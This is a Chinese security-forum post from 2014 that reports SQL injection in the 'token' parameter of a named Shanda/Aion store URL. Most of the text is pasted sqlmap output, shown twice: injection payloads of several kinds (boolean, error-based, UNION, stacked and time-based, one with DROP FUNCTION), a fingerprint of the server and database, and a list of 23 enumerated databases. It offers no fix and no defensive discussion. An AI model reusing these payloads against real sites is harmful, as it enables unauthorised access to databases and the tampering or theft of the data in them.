盛大分站存在SQL注射下载

来源:黑吧安全网 浏览:1440次 时间:2014-07-25
做网站找雨过天晴工作室

盛大分站存在SQL注入

http://store.aion.sdo.com:9101/project/20140506/index.aspx?token=

Place: GET

Parameter: token

Type: boolean-based blind

Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries

Payload: token='; IF(7189=7189) SELECT 7189 ELSE DROP FUNCTION pvfg--



Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: token=' AND 6557=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(115)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (6557=6557) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(99)+CHAR(107)+CHAR(113))) AND 'nflh'='nflh



Type: UNION query

Title: Generic UNION query (NULL) - 10 columns

Payload: token=' UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(115)+CHAR(109)+CHAR(113)+CHAR(73)+CHAR(116)+CHAR(88)+CHAR(80)+CHAR(83)+CHAR(89)+CHAR(107)+CHAR(71)+CHAR(87)+CHAR(69)+CHAR(113)+CHAR(113)+CHAR(99)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: token='; WAITFOR DELAY '0:0:5'--



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: token=' WAITFOR DELAY '0:0:5'--

---

web server operating system: Windows 2003

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0

back-end DBMS: Microsoft SQL Server 2008

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: token

Type: boolean-based blind

Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries

Payload: token='; IF(7189=7189) SELECT 7189 ELSE DROP FUNCTION pvfg--



Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: token=' AND 6557=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(115)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (6557=6557) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(99)+CHAR(107)+CHAR(113))) AND 'nflh'='nflh



Type: UNION query

Title: Generic UNION query (NULL) - 10 columns

Payload: token=' UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(115)+CHAR(109)+CHAR(113)+CHAR(73)+CHAR(116)+CHAR(88)+CHAR(80)+CHAR(83)+CHAR(89)+CHAR(107)+CHAR(71)+CHAR(87)+CHAR(69)+CHAR(113)+CHAR(113)+CHAR(99)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: token='; WAITFOR DELAY '0:0:5'--



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: token=' WAITFOR DELAY '0:0:5'--

---

web server operating system: Windows 2003

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0

back-end DBMS: Microsoft SQL Server 2008

available databases [23]:

[*] AgeProxyDB

[*] AgeProxyLogDB

[*] AionGuild

[*] AionLogProxy

[*] AionShop_AppData

[*] AionShop_BaseData

[*] AionShop_SysLog

[*] AionShop_TradeData

[*] BF_Team

[*] master

[*] model

[*] msdb

[*] RiftGuild

[*] RiftMiniShop_Basedata

[*] RiftMiniShop_SysLog

[*] RiftMiniShop_TradeData

[*] RiftShop_Basedata

[*] RiftShop_SysLog

[*] RiftShop_TradeData

[*] SeapCommonDB

[*] SmsProxy

[*] SNDC

[*] tempdb